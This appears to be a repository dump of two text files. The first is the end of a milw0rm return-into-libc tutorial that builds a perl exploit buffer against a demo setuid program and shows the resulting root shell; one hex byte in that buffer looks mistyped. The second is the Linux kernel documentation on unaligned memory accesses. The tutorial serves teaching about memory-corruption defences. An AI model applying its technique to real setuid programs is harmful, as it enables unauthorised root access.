509 | }
510 | 
511 | [shaunige@localhost shaunige]$ gcc vulnprog.c -o vulnprog
512 | [shaunige@localhost pcalc-000]$ ../vulnprog `perl -e 'print
513 | "1234"x13'`
514 | addr of buf is: 0xbffff780
515 | Segmentation fault
516 | [shaunige@localhost pcalc-000]$--END
517 | --END
518 | 
519 | 
520 | With a little simple hexadecimal addition, we can determine that 0xbffff780 + 48 
521 | = 0xbffff7b0.  This is the address which is the final function argument of 
522 | 'execl()', where the NULLs will be located.  We now have all of the information 
523 | we need, so exploitation will be easy.  Again, I'm going to craft the exploit 
524 | buffer from the console with perl, let's get going!
525 | 
526 | 
527 | --START
528 | 
529 | [shaunige@localhost shaunige]$ ./vulnprog `perl -e 'print "1234"x7 . 
530 | "\x10\xe3\x06\x40" . "\x80\xde\x0b\x40" . "\x5f\xff\xff\xbf" . "\xa9\xf9\xff\bf" 
531 | . "\xa9\xf9\xff\xbf" . "\xb0\xf7\xff\xbf"'`
532 | 
533 | sh-2.05b#
534 | 
535 | --END
536 | 
537 | 
538 | Well, well, looks like our little exploit worked!  Depending on your machine's 
539 | stack, you may need more garbage data (used for spacing) preceding your exploit 
540 | buffer, but it worked fine for us.
541 | 
542 | The exploit buffer was fed to 'vulnprog' thus overwriting the return address on 
543 | stack with the address of the libc 'printf()' function.  'printf()' then wrote 
544 | NULLs into the correct place, and exited.  Then 'execl()' executed our wrapper 
545 | program as instructed, which was designed to invoke a shell (/bin/sh) with 
546 | privileges of 'vulnprog' (root), leaving us with a lovely rootshell.  Voila.
547 | 
548 | 
549 | 
550 | ##############
551 | # Conclusion #
552 | ##############
553 | 
554 | I have hopefully given you a quick insight on an alternative to executing 
555 | arbitrary code during the exploitation of a stack-based overflow vulnerability 
556 | in a given program.  Non-executable stacks are becoming more and more common in 
557 | modern Operating Systems, and knowing how to 'return into libc' rather than 
558 | using shellcode can be a very useful thing to know.  I hope you've enjoyed this 
559 | article, I appreciate feedback.
560 | 
561 | <shaun2k2@excluded.org>
562 | http://www.excluded.org
563 | 
564 | 
565 | # milw0rm.com [2006-04-08]
566 | 567 | -------------------------------------------------------------------------------- /unaligned-memory.txt: -------------------------------------------------------------------------------- 1 | UNALIGNED MEMORY ACCESSES 2 | ========================= 3 | 4 | Linux runs on a wide variety of architectures which have varying behaviour 5 | when it comes to memory access. This document presents some details about 6 | unaligned accesses, why you need to write code that doesn't cause them, 7 | and how to write such code! 8 | 9 | 10 | The definition of an unaligned access 11 | ===================================== 12 | 13 | Unaligned memory accesses occur when you try to read N bytes of data starting 14 | from an address that is not evenly divisible by N (i.e. addr % N != 0). 15 | For example, reading 4 bytes of data from address 0x10004 is fine, but 16 | reading 4 bytes of data from address 0x10005 would be an unaligned memory 17 | access. 18 | 19 | The above may seem a little vague, as memory access can happen in different 20 | ways. The context here is at the machine code level: certain instructions read 21 | or write a number of bytes to or from memory (e.g. movb, movw, movl in x86 22 | assembly). As will become clear, it is relatively easy to spot C statements 23 | which will compile to multiple-byte memory access instructions, namely when 24 | dealing with types such as u16, u32 and u64. 25 | 26 | 27 | Natural alignment 28 | ================= 29 | 30 | The rule mentioned above forms what we refer to as natural alignment: 31 | When accessing N bytes of memory, the base memory address must be evenly 32 | divisible by N, i.e. addr % N == 0. 33 | 34 | When writing code, assume the target architecture has natural alignment 35 | requirements. 36 | 37 | In reality, only a few architectures require natural alignment on all sizes 38 | of memory access. However, we must consider ALL supported architectures; 39 | writing code that satisfies natural alignment requirements is the easiest way 40 | to achieve full portability. 41 | 42 | 43 | Why unaligned access is bad 44 | =========================== 45 | 46 | The effects of performing an unaligned memory access vary from architecture 47 | to architecture. It would be easy to write a whole document on the differences 48 | here; a summary of the common scenarios is presented below: 49 | 50 | - Some architectures are able to perform unaligned memory accesses 51 | transparently, but there is usually a significant performance cost. 52 | - Some architectures raise processor exceptions when unaligned accesses 53 | happen. The exception handler is able to correct the unaligned access, 54 | at significant cost to performance. 55 | - Some architectures raise processor exceptions when unaligned accesses 56 | happen, but the exceptions do not contain enough information for the 57 | unaligned access to be corrected. 58 | - Some architectures are not capable of unaligned memory access, but will 59 | silently perform a different memory access to the one that was requested, 60 | resulting in a subtle code bug that is hard to detect! 61 | 62 | It should be obvious from the above that if your code causes unaligned 63 | memory accesses to happen, your code will not work correctly on certain 64 | platforms and will cause performance problems on others. 65 | 66 | 67 | Code that does not cause unaligned access 68 | ========================================= 69 | 70 | At first, the concepts above may seem a little hard to relate to actual 71 | coding practice. After all, you don't have a great deal of control over 72 | memory addresses of certain variables, etc. 73 | 74 | Fortunately things are not too complex, as in most cases, the compiler 75 | ensures that things will work for you. For example, take the following 76 | structure: 77 | 78 | struct foo { 79 | u16 field1; 80 | u32 field2; 81 | u8 field3; 82 | }; 83 | 84 | Let us assume that an instance of the above structure resides in memory 85 | starting at address 0x10000. With a basic level of understanding, it would 86 | not be unreasonable to expect that accessing field2 would cause an unaligned 87 | access. You'd be expecting field2 to be located at offset 2 bytes into the 88 | structure, i.e. address 0x10002, but that address is not evenly divisible 89 | by 4 (remember, we're reading a 4 byte value here). 90 | 91 | Fortunately, the compiler understands the alignment constraints, so in the 92 | above case it would insert 2 bytes of padding in between field1 and field2. 93 | Therefore, for standard structure types you can always rely on the compiler 94 | to pad structures so that accesses to fields are suitably aligned (assuming 95 | you do not cast the field to a type of different length). 96 | 97 | Similarly, you can also rely on the compiler to align variables and function 98 | parameters to a naturally aligned scheme, based on the size of the type of 99 | the variable. 100 | 101 | At this point, it should be clear that accessing a single byte (u8 or char) 102 | will never cause an unaligned access, because all memory addresses are evenly 103 | divisible by one. 104 | 105 | On a related topic, with the above considerations in mind you may observe 106 | that you could reorder the fields in the structure in order to place fields 107 | where padding would otherwise be inserted, and hence reduce the overall 108 | resident memory size of structure instances. The optimal layout of the 109 | above example is: 110 | 111 | struct foo { 112 | u32 field2; 113 | u16 field1; 114 | u8 field3; 115 | }; 116 | 117 | For a natural alignment scheme, the compiler would only have to add a single 118 | byte of padding at the end of the structure. This padding is added in order 119 | to satisfy alignment constraints for arrays of these structures. 120 | 121 | Another point worth mentioning is the use of __attribute__((packed)) on a 122 | structure type. This GCC-specific attribute tells the compiler never to 123 | insert any padding within structures, useful when you want to use a C struct 124 | to represent some data that comes in a fixed arrangement 'off the wire'. 125 | 126 | You might be inclined to believe that usage of this attribute can easily 127 | lead to unaligned accesses when accessing fields that do not satisfy 128 | architectural alignment requirements. However, again, the compiler is aware 129 | of the alignment constraints and will generate extra instructions to perform 130 | the memory access in a way that does not cause unaligned access. Of course, 131 | the extra instructions obviously cause a loss in performance compared to the 132 | non-packed case, so the packed attribute should only be used when avoiding 133 | structure padding is of importance. 134 | 135 | 136 | Code that causes unaligned access 137 | ================================= 138 | 139 | With the above in mind, let's move onto a real life example of a function 140 | that can cause an unaligned memory access. The following function adapted 141 | from include/linux/etherdevice.h is an optimized routine to compare two 142 | ethernet MAC addresses for equality. 143 | 144 | unsigned int compare_ether_addr(const u8 *addr1, const u8 *addr2) 145 | { 146 | const u16 *a = (const u16 *) addr1; 147 | const u16 *b = (const u16 *) addr2; 148 | return ((a[0] ^ b[0]) | (a[1] ^ b[1]) | (a[2] ^ b[2])) != 0; 149 | } 150 | 151 | In the above function, the reference to a[0] causes 2 bytes (16 bits) to 152 | be read from memory starting at address addr1. Think about what would happen 153 | if addr1 was an odd address such as 0x10003. (Hint: it'd be an unaligned 154 | access.) 155 | 156 | Despite the potential unaligned access problems with the above function, it 157 | is included in the kernel anyway but is understood to only work on 158 | 16-bit-aligned addresses. It is up to the caller to ensure this alignment or 159 | not use this function at all. This alignment-unsafe function is still useful 160 | as it is a decent optimization for the cases when you can ensure alignment, 161 | which is true almost all of the time in ethernet networking context. 162 | 163 | 164 | Here is another example of some code that could cause unaligned accesses: 165 | void myfunc(u8 *data, u32 value) 166 | { 167 | [...] 168 | *((u32 *) data) = cpu_to_le32(value); 169 | [...] 170 | } 171 | 172 | This code will cause unaligned accesses every time the data parameter points 173 | to an address that is not evenly divisible by 4. 174 | 175 | In summary, the 2 main scenarios where you may run into unaligned access 176 | problems involve: 177 | 1. Casting variables to types of different lengths 178 | 2. Pointer arithmetic followed by access to at least 2 bytes of data 179 | 180 | 181 | Avoiding unaligned accesses 182 | =========================== 183 | 184 | The easiest way to avoid unaligned access is to use the get_unaligned() and 185 | put_unaligned() macros provided by the header file. 186 | 187 | Going back to an earlier example of code that potentially causes unaligned 188 | access: 189 | 190 | void myfunc(u8 *data, u32 value) 191 | { 192 | [...] 193 | *((u32 *) data) = cpu_to_le32(value); 194 | [...] 195 | } 196 | 197 | To avoid the unaligned memory access, you would rewrite it as follows: 198 | 199 | void myfunc(u8 *data, u32 value) 200 | { 201 | [...] 202 | value = cpu_to_le32(value); 203 | put_unaligned(value, (u32 *) data); 204 | [...] 205 | } 206 | 207 | The get_unaligned() macro works similarly. Assuming 'data' is a pointer to 208 | memory and you wish to avoid unaligned access, its usage is as follows: 209 | 210 | u32 value = get_unaligned((u32 *) data); 211 | 212 | These macros work for memory accesses of any length (not just 32 bits as 213 | in the examples above). Be aware that when compared to standard access of 214 | aligned memory, using these macros to access unaligned memory can be costly in 215 | terms of performance. 216 | 217 | If use of such macros is not convenient, another option is to use memcpy(), 218 | where the source or destination (or both) are of type u8* or unsigned char*. 219 | Due to the byte-wise nature of this operation, unaligned accesses are avoided. 220 | 221 | 222 | Alignment vs. Networking 223 | ======================== 224 | 225 | On architectures that require aligned loads, networking requires that the IP 226 | header is aligned on a four-byte boundary to optimise the IP stack. For 227 | regular ethernet hardware, the constant NET_IP_ALIGN is used. On most 228 | architectures this constant has the value 2 because the normal ethernet 229 | header is 14 bytes long, so in order to get proper alignment one needs to 230 | DMA to an address which can be expressed as 4*n + 2. One notable exception 231 | here is powerpc which defines NET_IP_ALIGN to 0 because DMA to unaligned 232 | addresses can be very expensive and dwarf the cost of unaligned loads. 233 | 234 | For some ethernet hardware that cannot DMA to unaligned addresses like 235 | 4*n+2 or non-ethernet hardware, this can be a problem, and it is then 236 | required to copy the incoming frame into an aligned buffer. Because this is 237 | unnecessary on architectures that can do unaligned accesses, the code can be 238 | made dependent on CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS like so: 239 | 240 | #ifdef CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS 241 | skb = original skb 242 | #else 243 | skb = copy skb 244 | #endif 245 | 246 | -- 247 | Authors: Daniel Drake , 248 | Johannes Berg 249 | With help from: Alan Cox, Avuton Olrich, Heikki Orsila, Jan Engelhardt, 250 | Kyle McMartin, Kyle Moffett, Randy Dunlap, Robert Hancock, Uli Kunitz, 251 | Vadim Lobanov 252 | 253 | --------------------------------------------------------------------------------